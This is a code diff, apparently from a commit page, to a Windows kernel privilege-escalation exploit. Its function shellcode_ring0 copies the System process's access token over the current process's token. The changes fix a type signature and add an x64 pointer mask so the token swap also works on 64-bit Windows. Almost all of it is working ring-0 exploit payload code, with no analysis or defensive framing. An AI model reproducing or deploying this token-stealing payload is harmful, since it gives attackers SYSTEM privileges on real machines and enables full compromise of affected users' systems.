@@ -38,7 +38,7 @@ typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
3838 OUT PVOID Process
3939);
4040
41- typedef NTSTATUS (NTAPI * lPsReferencePrimaryToken )(
41+ typedef PACCESS_TOKEN (NTAPI * lPsReferencePrimaryToken )(
4242 _Inout_ PVOID Process
4343);
4444
@@ -137,7 +137,7 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
137137
138138
139139// Search the specified data structure for a member with CurrentValue.
140- BOOL FindAndReplaceMember (PDWORD Structure ,
140+ BOOL find_and_replace_member (PDWORD Structure ,
141141 DWORD CurrentValue ,
142142 DWORD NewValue ,
143143 DWORD MaxSize )
@@ -146,8 +146,11 @@ BOOL FindAndReplaceMember(PDWORD Structure,
146146
147147 // Microsoft QWORD aligns object pointers, then uses the lower three
148148 // bits for quick reference counting.
149+ #ifdef _M_X64
150+ Mask = ~0xf ;
151+ #else
149152 Mask = ~7 ;
150-
153+ #endif
151154 // Mask out the reference count.
152155 CurrentValue &= Mask ;
153156
@@ -174,11 +177,11 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four)
174177 pPsLookupProcessByProcessId ((HANDLE )dwMyProcessId , & pMyProcessInfo );
175178 pPsLookupProcessByProcessId ((HANDLE )4 , & pSystemInfo );
176179
177- TargetToken = ( PACCESS_TOKEN ) pPsReferencePrimaryToken (pMyProcessInfo );
178- SystemToken = ( PACCESS_TOKEN ) pPsReferencePrimaryToken (pSystemInfo );
180+ TargetToken = pPsReferencePrimaryToken (pMyProcessInfo );
181+ SystemToken = pPsReferencePrimaryToken (pSystemInfo );
179182
180183 // Find the token in the target process, and replace with the system token.
181- FindAndReplaceMember ((PDWORD )pMyProcessInfo ,
184+ find_and_replace_member ((PDWORD )pMyProcessInfo ,
182185 (DWORD )TargetToken ,
183186 (DWORD )SystemToken ,
184187 0x200 );
0 commit comments